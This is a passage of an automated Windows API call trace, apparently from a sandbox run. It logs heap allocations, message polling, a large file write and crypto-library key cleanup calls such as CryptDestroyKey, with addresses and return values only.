dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0199.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0199.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0199.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0199.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0199.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0199.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3cc2328 [0199.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3d58fc8 [0199.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0199.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0199.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3cc2328 | out: hHeap=0x970000) returned 1 [0199.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0199.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3cc2328 [0199.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d58fc8 | out: hHeap=0x970000) returned 1 [0199.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0199.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3d58fc8 [0199.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3cc2328 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0199.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0199.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0199.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0199.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0199.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0199.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0199.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c76cd8 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0199.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c2b690 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0199.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d0d978 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0199.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0199.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0199.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0199.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0199.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0199.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0199.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0199.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0199.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0199.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0199.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0199.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0199.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0199.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3d0d008 [0199.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d58fc8 | out: hHeap=0x970000) returned 1 [0199.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0199.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0199.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0199.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0199.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0199.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0199.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0199.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0199.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0199.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0199.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0199.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0199.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3d58658 [0199.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0199.996] WriteFile (in: hFile=0x2a0, lpBuffer=0x3d58658*, nNumberOfBytesToWrite=0x4b648, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3d58658*, lpNumberOfBytesWritten=0x8cf5e4*=0x4b648, lpOverlapped=0x0) returned 1 [0200.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0200.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d58658 | out: hHeap=0x970000) returned 1 [0200.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0200.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0200.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0200.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0200.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0200.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.030] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0200.030] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.031] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.031] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0200.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0200.032] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0200.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e506f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0200.032] CryptDestroyKey (hKey=0xa86f50) returned 1 [0200.033] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.033] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.033] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0200.033] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: 